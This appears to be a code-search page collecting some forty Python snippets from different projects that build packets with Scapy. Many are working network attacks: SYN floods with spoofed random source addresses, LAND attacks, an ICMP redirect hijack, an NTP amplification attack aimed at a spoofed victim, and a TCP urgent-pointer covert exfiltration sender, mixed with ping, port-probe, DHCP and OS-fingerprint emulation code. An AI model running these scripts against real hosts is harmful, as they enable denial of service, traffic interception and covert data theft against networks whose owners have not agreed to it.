示例#1
0
def icmp_redirect(ip_gw, ip_victim, ip_attacker, ip_targetroute):
    """Try ICMP Redirect attack

    Args:
        ip_gw (str): Gateway IP
        ip_victim (str) : Target/Victim IP
        ip_attacker (str) : Attacker IP
        ip_targetroute (str) : IP of network to reach in ICMP payload

        interface ???
    """

    ip = IP()
    ip.src = ip_gw
    ip.dst = ip_victim

    icmp = ICMP()
    icmp.type = 5
    icmp.code = 1
    icmp.gw = ip_attacker

    ip2 = IP()
    ip2.src = ip_victim
    ip2.dst = ip_targetroute

    icmp2 = ICMP()
    icmp2.type = 0
    icmp2.code = 0

    # Send packets at Layer 3(Scapy creates Layer 2 header), Does not recieve any packets.
    send(ip / icmp / ip2 / icmp2, iface="eth1")
示例#2
0
文件: agent.py 项目: pcaro90/Ares
            def run(self):
                # Damn, ugly!
                global forging

                if forging:
                    i = IP()
                    i.dst = ip
                    if spoofing:
                        i.src = '.'.join(
                            random.randint(1, 254) for _ in range(4))

                    t = TCP()
                    t.sport = random.randint(1, 65535)
                    t.dport = port
                    t.flags = 'S'

                    try:
                        send(i / t, verbose=0)
                    except PermissionError:
                        print('ohno, not forging')
                        forging = False

                else:
                    s = socket.socket()
                    s.connect((self.ip, self.port))
示例#3
0
def cmd_land(ip, count, port, iface, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
示例#4
0
def service_craft(pkt, fp, mac, service, type_=False):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.ttl, 16)
    ip.flags = 0x4000

    tcp = TCP()
    tcp.sport = pkt[TCP].dport
    tcp.dport = pkt[TCP].sport

    if type_:
        tcp.flags = 0x018  # PSH / ACK
        tcp.seq = pkt[TCP].seq
        tcp.ack = pkt[TCP].ack
        data = service[pkt[TCP].dport]
        fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
        return fin_pkt
    else:
        tcp.flags = 0x012  # SYN / ACK
        tcp.seq = pkt[TCP].seq
        tcp.ack = pkt[TCP].seq + 1
        fin_pkt = ip / tcp if ether is None else ether / ip / tcp
        return fin_pkt
示例#5
0
文件: icmpflood.py 项目: sfluo/Mr.Bot
	def run(self):
		print "Starting %s %s %d" % (self.name, self.target, self.port)
		i = IP() 
		i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254))
		i.dst = self.target
		t = ICMP()
		print "Spoofing %s to send ICMP ..." % i.src
		sr1(i/ICMP,verbose=0)
示例#6
0
def seqgen_pkt_craft(pkt, fp, mac, pno):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['T1']['TTL'], 16)
    ip.flags = fp.probe['T1']['DF']
    ip.id = fp.ip_id_gen()

    tcp = TCP()

    s_val = fp.probe['T1']['S']
    if s_val == 'Z':
        tcp.seq = 0
    elif s_val == 'A':
        tcp.seq = pkt[TCP].ack
    elif s_val == 'A+':
        tcp.seq = pkt[TCP].ack + 1
    else:
        tcp.seq = fp.tcp_seq_gen()

    a_val = fp.probe['T1']['A']
    if a_val == 'Z':
        tcp.ack = 0
    elif a_val == 'S':
        tcp.ack = pkt[TCP].seq
    elif a_val == 'S+':
        tcp.ack = pkt[TCP].seq + 1
    else:
        tcp.ack = pkt[TCP].seq + 369

    flag_val = fp.probe['T1']['F']
    tcp.flags = flag_val

    tcp.window = fp.probe['WIN']['W' + pno]

    tcp.sport = pkt[TCP].dport
    tcp.dport = pkt[TCP].sport

    tcp.options = fp.probe['OPS']['O' + pno]

    rd_val = fp.probe['T1']['RD']
    if rd_val != '0':
        crc = int(rd_val, 16)
        data = b'TCP Port is closed\x00'
        data += compensate(data, crc)
        fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data

    else:
        fin_pkt = ip / tcp if ether is None else ether / ip / tcp
    return fin_pkt
示例#7
0
def doSynFlood(origin_ip=None, origin_port=None, 
        target_ip=None, target_port=None, 
        interface=None, duration=None, gap=0):
    '''
    Starts Syn Flood attacks

    Arguments:
        origin_ip (str): attacker ip
        origin_port (int): attacker port
        target_ip (str): target ip
        target_port (int): target port
        interface (str): network interface to use
        duration (int): duration of the attack
        gap (int): gap (delay) between packets

    Returns:
        None
    '''
    
    # Check if everything is filled out
    if target_ip is None:
        return
    if target_port is None:
        return
    if duration is None:
        return
    if gap >= duration:
        return

    # Prepare the packet
    ip_layer = IP()
    ip_layer.src = origin_ip
    ip_layer.dst = target_ip

    tcp_layer = TCP()	
    tcp_layer.sport = origin_port
    tcp_layer.dport = target_port
    tcp_layer.flags = "S"


    # Prepare timings
    time_start = time()
    time_end = time_start + duration


    # Start attack
    while (time() <= time_end): #duration

        # Constantly changing values
        tcp_layer.seq = GenerateRandomSafeSeq()
        tcp_layer.ack = GenerateRandomSafeSeq()
        tcp_layer.window = GenerateRandomWindow()

        attack_packet = ip_layer/tcp_layer # packet to send

        send(attack_packet, iface=interface)
        if gap > 0:
            sleep(gap) #gap
示例#8
0
 def run(self):
     print "Starting %s %s %d" % (self.name, self.target, self.port)
     i = IP()
     i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
         1, 254), random.randint(1, 254), random.randint(1, 254))
     i.dst = self.target
     t = ICMP()
     print "Spoofing %s to send ICMP ..." % i.src
     sr1(i / ICMP, verbose=0)
示例#9
0
def cmd_land(ip, count, port, iface, verbose):
    """This command implements the LAND attack, that sends packets forging the
    source IP address to be the same that the destination IP. Also uses the
    same source and destination port.

    The attack is very old, and can be used to make a Denial of Service on
    old systems, like Windows NT 4.0. More information here:
    https://en.wikipedia.org/wiki/LAND

    \b
    # sudo habu.land 172.16.0.10
    ............

    Note: Each dot (.) is a sent packet. You can specify how many
    packets send with the '-c' option. The default is never stop. Also, you
    can specify the destination port, with the '-p' option.
    """

    conf.verb = False

    if iface:
        iface = search_iface(iface)
        if iface:
            conf.iface = iface['name']
        else:
            logging.error(
                'Interface {} not found. Use habu.interfaces to show valid network interfaces'
                .format(iface))
            return False

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
示例#10
0
文件: synspoof.py 项目: sfluo/Mr.Bot
	def run(self):
		print "Starting %s %s %d" % (self.name, self.target, self.port)
		i = IP() 
		i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254))
		i.dst = self.target
		t = TCP()
		t.dport = self.port
		t.flags='S'	
		print "Spoofing %s to send SYN ..." % i.src
		sr1(i/t,verbose=0)
示例#11
0
 def syn_flood(self, target, port):
     from scapy.all import IP, TCP, send
     i = IP()
     i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
     i.dst = target
     t = TCP()
     t.sport = random.randint(1, 65500)
     t.dport = port
     t.flags = 'S'
     send(i / t, verbose=0)
示例#12
0
def udp_craft(pkt, mac, fp):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['U1']['TTL'], 16)
    ip.flags = fp.probe['U1']['DF']
    ip.len = 56
    ip.id = 4162

    icmp = ICMP()
    icmp.type = 3
    icmp.unused = 0
    icmp.code = 13  # code 3 for reply

    iperror = IPerror()
    iperror.proto = 'udp'
    iperror.ttl = 0x3E
    iperror.len = fp.probe['U1']['RIPL']
    iperror.id = fp.probe['U1']['RID']

    ripck_val = fp.probe['U1']['RIPCK']
    if ripck_val == 'G':
        pass
    elif ripck_val == 'Z':
        iperror.chksum = 0
    else:
        iperror.chksum = pkt[IP].chksum

    udperror = UDPerror()
    udperror.sport = pkt[UDP].sport
    udperror.dport = pkt[UDP].dport
    udperror.len = pkt[UDP].len
    if fp.probe['U1']['RUCK'] == 'G':
        udperror.chksum = pkt[UDP].chksum
    else:
        udperror.chksum = fp.probe['U1']['RUCK']

    try:
        ipl = int(fp.probe['U1']['IPL'], 16)
    except KeyError:
        ipl = None

    data = pkt[Raw].load

    fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data

    return fin_pkt
示例#13
0
def cmd_ping(ip, interface, count, timeout, wait, verbose):
    """The classic ping tool that send ICMP echo requests.

    \b
    # habu.ping 8.8.8.8
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    """

    if interface:
        conf.iface = interface

    conf.verb = False
    conf.L3socket=L3RawSocket

    layer3 = IP()
    layer3.dst = ip
    layer3.tos = 0
    layer3.id = 1
    layer3.flags = 0
    layer3.frag = 0
    layer3.ttl = 64
    layer3.proto = 1 # icmp

    layer4 = ICMP()
    layer4.type = 8 # echo-request
    layer4.code = 0
    layer4.id = 0
    layer4.seq = 0

    pkt = layer3 / layer4

    counter = 0

    while True:
        ans = sr1(pkt, timeout=timeout)
        if ans:
            if verbose:
                ans.show()
            else:
                print(ans.summary())
            del(ans)
        else:
            print('Timeout')

        counter += 1

        if count != 0 and counter == count:
            break

        sleep(wait)

    return True
示例#14
0
def cmd_icmp_ping(ip, interface, count, timeout, wait, verbose):
    """The classic ping tool that send ICMP echo requests.

    \b
    # habu.icmp.ping 8.8.8.8
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
    """

    if interface:
        conf.iface = interface

    conf.verb = False
    conf.L3socket = L3RawSocket

    layer3 = IP()
    layer3.dst = ip
    layer3.tos = 0
    layer3.id = 1
    layer3.flags = 0
    layer3.frag = 0
    layer3.ttl = 64
    layer3.proto = 1  # icmp

    layer4 = ICMP()
    layer4.type = 8  # echo-request
    layer4.code = 0
    layer4.id = 0
    layer4.seq = 0

    pkt = layer3 / layer4

    counter = 0

    while True:
        ans = sr1(pkt, timeout=timeout)
        if ans:
            if verbose:
                ans.show()
            else:
                print(ans.summary())
            del (ans)
        else:
            print('Timeout')

        counter += 1

        if count != 0 and counter == count:
            break

        sleep(wait)

    return True
示例#15
0
    def run(self):
        i = IP()
        i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        i.dst = self.target

        t = TCP()
        t.sport = random.randint(1, 65535)
        t.dport = self.port
        t.flags = 'S'

        send(i / t, verbose=0)
示例#16
0
 def run(self):
     print "Starting %s %s %d" % (self.name, self.target, self.port)
     i = IP()
     i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
         1, 254), random.randint(1, 254), random.randint(1, 254))
     i.dst = self.target
     t = TCP()
     t.dport = self.port
     t.flags = 'S'
     print "Spoofing %s to send SYN ..." % i.src
     sr1(i / t, verbose=0)
    def run(self):
        i = IP()
        i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
            1, 254), random.randint(1, 254), random.randint(1, 254))
        i.dst = target

        t = TCP()
        t.sport = random.randint(1, 65535)
        t.dport = port
        t.flags = 'S'

        send(i/t, verbose=0)
 def send_data(self, bytestream):
     if self.verbose():
         print("Exfiltrating " + repr(bytestream.decode('us-ascii')))
     packet = IP() / TCP()
     packet.dst = self.host()
     packet.dport = self.dest_port()
     packet.sport = self.source_port()
     packet.getlayer(TCP).flags = 0x20 | 0x02  # URG & SYN
     packet.urgptr = self.int_for(bytestream)
     if self.verbose():
         packet.show()
     send(packet, verbose=self.verbose())
def ntp_amplification():
	global g_target_ip, g_ntp_servers

	# Create the NTP request
	ip = IP(src = g_target_ip)
	udp = UDP(sport = RandShort(), dport = 123)
	ntp = NTPPrivate(mode = 7, implementation = "XNTPD", request_code = "REQ_MON_GETLIST_1")

	while True:
		# Send the request to each of the NTP servers
		for ntp_ip in g_ntp_servers:
			ip.dst = ntp_ip
			packet = ip/udp/ntp
			send(packet)
示例#20
0
    def run(self):
        packet_ip = IP()
        packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254),
                                             random.randint(1, 254),
                                             random.randint(1, 254),
                                             random.randint(1, 254))
        packet_ip.dst = self.host

        packet_tcp = TCP()
        packet_tcp.sport = random.randint(1024, 65535)
        packet_tcp.dport = self.port
        packet_tcp.flags = 'S'

        send(packet_ip/packet_tcp)
示例#21
0
def cmd_land(ip, count, port, iface, verbose):
    """This command implements the LAND attack, that sends packets forging the
    source IP address to be the same that the destination IP. Also uses the
    same source and destination port.

    The attack is very old, and can be used to make a Denial of Service on
    old systems, like Windows NT 4.0. More information here:
    https://en.wikipedia.org/wiki/LAND

    \b
    # sudo habu.land 172.16.0.10
    ............

    Note: Each dot (.) is a sent packet. You can specify how many
    packets send with the '-c' option. The default is never stop. Also, you
    can specify the destination port, with the '-p' option.
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
示例#22
0
def ecn_craft(pkt, mac, fp):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['ECN']['TTL'], 16)

    ip_flag = fp.probe['ECN']['DF']
    if ip_flag == 'Y':
        ip.flags = 2
    else:
        ip.flags = 0
    ip.id = fp.ip_id_gen()

    tcp = TCP()
    w_val = fp.probe['ECN']['W']
    if w_val == 'ECHOED':
        tcp.window = pkt[TCP].window
    else:
        tcp.window = w_val
    tcp.sport = pkt[TCP].dport
    tcp.dport = pkt[TCP].sport

    cc_val = fp.probe['ECN']['CC']
    if cc_val == 'Y':
        tcp.flags = 0x52
    elif cc_val == 'N':
        tcp.flags = 0x12
    elif cc_val == 'S':
        tcp.flags = 0xD2
    else:
        tcp.flags = 0x10

    o_val = fp.probe['ECN']['O']
    if o_val == 'EMPTY':
        pass
    else:
        tcp.options = o_val

    fin_pkt = ip / tcp if ether is None else ether / ip / tcp

    return fin_pkt
示例#23
0
def IP_layer(attributes):
    layer3 = IP()
    layer3.version = attributes['version']
    layer3.ihl = attributes['ihl']
    layer3.tos = attributes['tos']
    layer3.len = attributes['len']
    layer3.id = attributes['id']
    layer3.flags = attributes['flags']
    layer3.frag = attributes['frag']
    layer3.ttl = attributes['ttl']
    layer3.proto = attributes['proto']
    layer3.src = attributes['src']
    layer3.dst = attributes['dst']

    return layer3
示例#24
0
def three_way_handshake(ip_dst, sniffer, port_num):
    ip = IP(ttl=255)
    ip.src = MY_IP
    ip.dst = ip_dst

    tcp = TCP(
        sport=port_num,
        dport=443,
        flags='S',
        seq=1000,
        window=65535,
        options=[("MSS", MSS_SIZE), ('WScale', 10)])

    SYNACK = sr1(ip / tcp, verbose=False, timeout=2)
    if not SYNACK:
        return "NOSYNACK"

    tls = TLSRecord() / TLSHandshakes(handshakes=[
        TLSHandshake() / TLSClientHello(
            compression_methods=list(range(0xff))[::-1],
            cipher_suites=list(range(0xff)))
    ])

    tls_raw = str(tls)
    ptr = 0
    current_ack = SYNACK.ack

    if SYNACK.seq is None:
        return "SYNACKERROR"

    while ptr < len(tls_raw):
        ACK = TCP(
            sport=port_num,
            dport=443,
            flags='A',
            seq=current_ack,
            ack=SYNACK.seq + 1,
            window=65535,
            options=[("MSS", MSS_SIZE), ('WScale', 10)])

        tls_frag = tls_raw[ptr:ptr + MSS_SIZE]
        send(ip / ACK / tls_frag, verbose=False)
        ptr += MSS_SIZE
        current_ack += len(tls_frag)

    sniffer.client_hello_sent = True

    return "SUCCESS"
示例#25
0
文件: cmd_ping.py 项目: venutrue/habu
def cmd_ping(ip, interface, count, timeout, wait, verbose):

    if interface:
        conf.iface = interface

    conf.verb = False
    conf.L3socket = L3RawSocket

    layer3 = IP()
    layer3.dst = ip
    layer3.tos = 0
    layer3.id = 1
    layer3.flags = 0
    layer3.frag = 0
    layer3.ttl = 64
    layer3.proto = 1  # icmp

    layer4 = ICMP()
    layer4.type = 8  # echo-request
    layer4.code = 0
    layer4.id = 0
    layer4.seq = 0

    pkt = layer3 / layer4

    counter = 0

    while True:
        ans = sr1(pkt, timeout=timeout)
        if ans:
            if verbose:
                ans.show()
            else:
                print(ans.summary())
            del (ans)
        else:
            print('Timeout')

        counter += 1

        if count != 0 and counter == count:
            break

        sleep(wait)

    return True
示例#26
0
def is_port_open(ip_addr, port, timeout=5, verbose=False):
    ip = IP()
    ip.dst = ip_addr

    syn = TCP()
    syn.sport = choice(range(1000, 50000))
    syn.dport = port
    syn.flags = 'S'
    syn.seq = 1

    packet = ip/syn

    synack = sr1(packet, timeout=timeout, verbose=verbose)

    if synack and synack.sprintf('%TCP.flags%') == 'SA':
        return True

    return False
示例#27
0
def sendSYN(host, port):
    # Create an IP Packet using random ip as source and the target IP as destination
    ipPacket = IP()
    ipPacket.src = ".".join(
        map(str, (random.randint(0, 255) for i in range(4))))
    ipPacket.dst = host

    # Create a TCP segment using a random source port and the target port as the destination
    tcpSegment = TCP()
    tcpSegment.sport = random.randint(1000, 65535)
    tcpSegment.dport = port

    # Set the syn flag
    tcpSegment.flags = 'S'

    # Send the composition of the two (package/segment) and ignore the result
    send(ipPacket / tcpSegment, verbose=0)
    pass
示例#28
0
文件: syn.py 项目: mariklolik/Impulse
def flood(target):
	IP_Packet = IP()
	IP_Packet.src = randomData.random_IP()
	IP_Packet.dst = target[0]

	TCP_Packet = TCP()
	TCP_Packet.sport = random.randint(1000, 10000)
	TCP_Packet.dport = target[1]
	TCP_Packet.flags = "S"
	TCP_Packet.seq = random.randint(1000, 10000)
	TCP_Packet.window = random.randint(1000, 10000)

	for _ in range(16):
		try:
			send(IP_Packet / TCP_Packet, verbose = False)
		except Exception as e:
			print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}")
		else:
			print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
示例#29
0
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):

    conf.verb = False

    if interface:
        conf.iface = interface

    layer2 = Ether()

    layer3 = IP()
    layer3.dst = ip

    layer4 = TCP()
    layer4.dport = port

    pkt = layer2 / layer3 / layer4

    counter = 0

    print("Please, remember to block your RST responses", file=sys.stderr)

    while True:
        if forgeip:
            pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit(
                '.', maxsplit=1)[0], randint(1, 254))
        if forgemac:
            pkt[Ether].src = RandMAC()

        pkt[TCP].sport = randint(10000, 65000)

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        sendp(pkt)
        counter += 1

        if count != 0 and counter == count:
            break

    return True
示例#30
0
def syn_flood(ip_destination, port_destination, limit):
    total = 0
    print("Enviando Pacotes")
    for x in range(0, limit):
        ip_packet = IP()
        ip_packet.src = ".".join(
            map(str, (random.randint(0, 255) for _ in range(4))))
        ip_packet.dst = ip_destination

        tcp_packet = TCP()
        tcp_packet.sport = random.randint(1000, 9000)
        tcp_packet.dport = port_destination
        tcp_packet.flags = "S"
        tcp_packet.seq = random.randint(1000, 9000)
        tcp_packet.window = random.randint(1000, 9000)

        print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport))
        send(ip_packet / tcp_packet, verbose=0)
        total += 1
    print("All packets sent")
示例#31
0
def icmp_craft(pkt, fp, mac):
    try:
        ether = Ether()
        ether.src = mac
        ether.dst = pkt[Ether].dst
        ether.type = 0x800
    except IndexError:
        ether = None

    ip = IP()
    ip.src = pkt[IP].dst
    ip.dst = pkt[IP].src
    ip.ttl = int(fp.probe['IE']['TTL'], 16)
    dfi_flag = fp.probe['IE']['DFI']
    if dfi_flag == 'N':
        ip.flags = 0
    elif dfi_flag == 'S':
        ip.flags = pkt[IP].flags
    elif dfi_flag == 'Y':
        ip.flags = 2
    else:
        ip.flags = 0 if pkt[IP].flags == 2 else 2

    ip.id = fp.ip_id_icmp_gen()
    icmp = ICMP()
    icmp.type = 0
    icmp.id = pkt[ICMP].id

    cd_val = fp.probe['IE']['CD']
    if cd_val == 'Z':
        icmp.code = 0
    elif cd_val == 'S':
        icmp.code = pkt[ICMP].code
    else:
        icmp.code = random.randint(0, 15)

    icmp.seq = pkt[ICMP].seq
    data = pkt[ICMP].payload

    fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data
    return fin_pkt
示例#32
0
def flood(target):
    IP_Packet = IP()
    IP_Packet.src = random_IP()
    IP_Packet.dst = target[0]

    TCP_Packet = TCP()
    TCP_Packet.sport = random.randint(1000, 10000)
    TCP_Packet.dport = target[1]
    TCP_Packet.flags = "S"
    TCP_Packet.seq = random.randint(1000, 10000)
    TCP_Packet.window = random.randint(1000, 10000)

    for _ in range(16):
        try:
            send(IP_Packet / TCP_Packet, verbose=False)
        except Exception as e:
            print(f"[{red} bold][✘] ERROR[/{red} bold] " +
                  f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}")
        else:
            print(f"[{green}][✔] SUCCESS[/{green}] " +
                  f"[{yellow}]SYN packet sent to[{yellow}] " +
                  f"[{blue}]{'{}:{}'.format(*target)}")
示例#33
0
文件: syn.py 项目: Marshmello1912/Git
    def syn_flood():
        global FINISH
        while True:
            if FINISH:
                break

            IP_Packet = IP()
            IP_Packet.src = randomData.random_IP()
            IP_Packet.dst = target_ip

            TCP_Packet = TCP()
            TCP_Packet.sport = random.randint(1000, 10000)
            TCP_Packet.dport = target_port
            TCP_Packet.flags = "S"
            TCP_Packet.seq = random.randint(1000, 10000)
            TCP_Packet.window = random.randint(1000, 10000)
            try:
                send(IP_Packet / TCP_Packet, verbose=False)
            except Exception as e:
                print(e)
            else:
                print("[+] SYN packet sent!")
示例#34
0
def flood(target):
    IP_Packet = IP()
    IP_Packet.src = random_IP()
    IP_Packet.dst = target[0]

    TCP_Packet = TCP()
    TCP_Packet.sport = random.randint(1000, 10000)
    TCP_Packet.dport = target[1]
    TCP_Packet.flags = "S"
    TCP_Packet.seq = random.randint(1000, 10000)
    TCP_Packet.window = random.randint(1000, 10000)

    for _ in range(16):
        try:
            send(IP_Packet / TCP_Packet, verbose=False)
        except Exception as e:
            print(
                f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}"
            )
        else:
            print(
                f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m"
            )
示例#35
0
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
    """Launch a lot of TCP connections and keeps them opened.

    Some very old systems can suffer a Denial of Service with this.

    Reference: https://en.wikipedia.org/wiki/SYN_flood

    Example:

    \b
    # sudo habu.synflood 172.16.0.10
    .................

    Each dot is a packet sent.

    You can use the options '-2' and '-3' to forge the layer 2/3 addresses.

    If you use them, each connection will be sent from a random layer2 (MAC)
    and/or layer3 (IP) address.

    You can choose the number of connections to create with the option '-c'.
    The default is never stop creating connections.

    Note: If you send the packets from your real IP address and you want
    to keep the connections half-open, you need to setup for firewall to
    don't send the RST packets.
    """

    conf.verb = False

    if interface:
        conf.iface = interface

    layer2 = Ether()

    layer3 = IP()
    layer3.dst = ip

    layer4 = TCP()
    layer4.dport = port

    pkt = layer2 / layer3 / layer4

    counter = 0

    print("Please, remember to block your RST responses", file=sys.stderr)

    while True:
        if forgeip:
            pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))
        if forgemac:
            pkt[Ether].src = RandMAC()

        pkt[TCP].sport = randint(10000, 65000)

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        sendp(pkt)
        counter += 1

        if count != 0 and counter == count:
            break

    return True
示例#36
0
import sys
from scapy.all import sr1, IP, TCP, UDP, ICMP

# User must supply host and port
if len(sys.argv) < 3:
    print "Invalid syntax: ps.py [-u -t -i] <target IP> <p1[ p2 p3 ...]>"
else:
    # TCP SYN
    if sys.argv[1] == "-t":
        print "TCP SYN scan on host " + sys.argv[2] + "\n"

        ip = IP()
        tcp = TCP()

        # cast as str and int to avoid issues caused by periods
        ip.dst = str(sys.argv[2])
        # loop iterates through as many commandline arguments were given
        for port in range(len(sys.argv) - 3):
            print "Scanning port " + str(sys.argv[port + 3])
            # port+3 is start of ports
            tcp.dport = int(sys.argv[port + 3])
            # send SYN packet
            tcp.flags = "S"
            packet = (ip / tcp)
            # verbose=0 to limit console output; timeout 1s
            status = sr1(packet, verbose=0, timeout=1)
            if status:
                print str(packet.dport) + " is open\n"
    # UDP
    elif sys.argv[1] == "-u":
        print "UDP scan on host " + sys.argv[2] + "\n"
示例#37
0
    53,     # dns
    443,    # https
    110,    # pop3
    445,    # ms-ds
    8080,   # tomcat
    4567,   # filenail (commonly open port for backdoors)
]

# try each common port until one responds

for port in common_ports:

    # assemble IP packet with target IP

    ip = IP()
    ip.dst = target_ip

    # assemble TCP with dst port and SYN flag set

    tcp = TCP()
    tcp.dport = port
    tcp.flags = 'S'

    print('Trying port %d' % port)

    # send the packet and wait 2 seconds for an answer

    rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)

    # if answered no need to try more ports
示例#38
0
  if cpid:
    # the sending process

    sleep(5) # to make sure that the other process started listening for packets

    if ip6 == False:
      pkt = IP(dst = int2addr(addrbeg,ip6))/TCP(sport = 1026, dport = port)
    else:
      pkt = IPV6(dst = int2addr(addrbeg,ip6))/TCP(sport = 1026, dport = port)

    host = addrbeg

    try:
      while host <= addrend:
        ip = int2addr(host , ip6)
        pkt.dst = ip  # FIXME
        pkt.seq = seqgen(ip+":"+str(port)+salt)
        send(pkt)
        host+=1

      os.wait()
    except:
      os.kill(cpid,15)

  else:
    # this is the listening and printing process
    try:
      sniff(filter = "ip and tcp", lfilter = lambda x: checkpkt(x))
    except:
      pass
示例#39
0
A very basic script to send a DHCP Discover message. 
Capture the packages to see what's wrong.
"""
import scapy
from scapy.sendrecv import sendp, sniff
from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP

# data link layer
ethernet = Ether()
ethernet.show()
ethernet.dst = "ff:ff:ff:ff:ff:ff"

# network layer
ip = IP()
ip.show()
ip.dst = "255.255.255.255"

# transport layer
udp = UDP()
udp.show()
udp.sport = 68
udp.dport = 67

# application layer
bootp = BOOTP()
bootp.show()
bootp.flags = 1

dhcp = DHCP()
dhcp.show()
dhcp.options = [("message-type", "discover"), "end"]
示例#40
0
#*** Get parameters from command line
SRC_MAC = sys.argv[1]
DST_MAC = sys.argv[2]
SRC_IP = sys.argv[3]
DST_IP = sys.argv[4]
IF_NAME = sys.argv[5]
REPEAT_INTERVAL = float(sys.argv[6])
REPEAT_COUNT = int(sys.argv[7])

data = "blahblahblah"
# define ip and icmp
eth = Ether()
eth.src=SRC_MAC
eth.dst=DST_MAC
ip = IP()
ip.src = SRC_IP
ip.dst = DST_IP
icmp = ICMP()
icmp.type = 8
icmp.code = 0

finished = 0
count = 0
while not finished:
    sendp(eth/ip/icmp/data, iface=IF_NAME)
    time.sleep(REPEAT_INTERVAL)
    count += 1
    if count >= REPEAT_COUNT:
        finished = 1
示例#41
0
    53,     # dns
    443,    # https
    110,    # pop3
    445,    # ms-ds
    8080,   # tomcat
    4567,   # filenail (commonly open port for backdoors)
]

# try each common port until one responds

for port in common_ports:

    # assemble IP packet with target IP

    ip = IP()
    ip.dst = target_ip

    # assemble TCP with dst port and SYN flag set

    tcp = TCP()
    tcp.dport = port
    tcp.flags = 'S'

    print 'Trying port %d' % port

    # send the packet and wait 2 seconds for an answer

    rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0)

    # if answered no need to try more ports